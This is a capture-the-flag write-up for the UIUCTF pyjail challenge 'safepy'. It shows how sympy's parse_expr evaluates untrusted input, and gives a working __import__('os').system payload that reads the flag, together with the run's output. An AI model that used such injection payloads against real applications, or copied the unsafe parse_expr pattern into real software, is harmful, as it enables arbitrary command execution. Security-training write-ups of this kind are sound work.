Tags: pyjail python
Rating: 4.0
## rev/safepy
**Description: godlike snake with a nebula behind it and math equations floating around it**
Given python script
```python
from sympy import *
def parse(expr):
# learned from our mistake... let's be safe now
# https://stackoverflow.com/questions/33606667/from-string-to-sympy-expression
# return sympify(expr)
# https://docs.sympy.org/latest/modules/parsing.html
return parse_expr(expr)
print('Welcome to the derivative (with respect to x) solver!')
user_input = input('Your expression: ')
expr = parse(user_input)
deriv = diff(expr, Symbol('x'))
print('The derivative of your expression is:')
print(deriv)
```
This issue in github shows the vulnerability in **parse_expr**.
[vulnerable explanation](https://github.com/sympy/sympy/issues/10805#issuecomment-1002147366)
**payload:**
```python
__import__("os").system("cd / && cat flag")
```
**Output**
```shell
== proof-of-work: disabled ==
Welcome to the derivative (with respect to x) solver!
Your expression: __import__("os").system("cd / && cat flag")
uiuctf{na1v3_0r_mal1ci0u5_chang3?}
The derivative of your expression is:
0
```
**flag:uiuctf{na1v3_0r_mal1ci0u5_chang3?}**
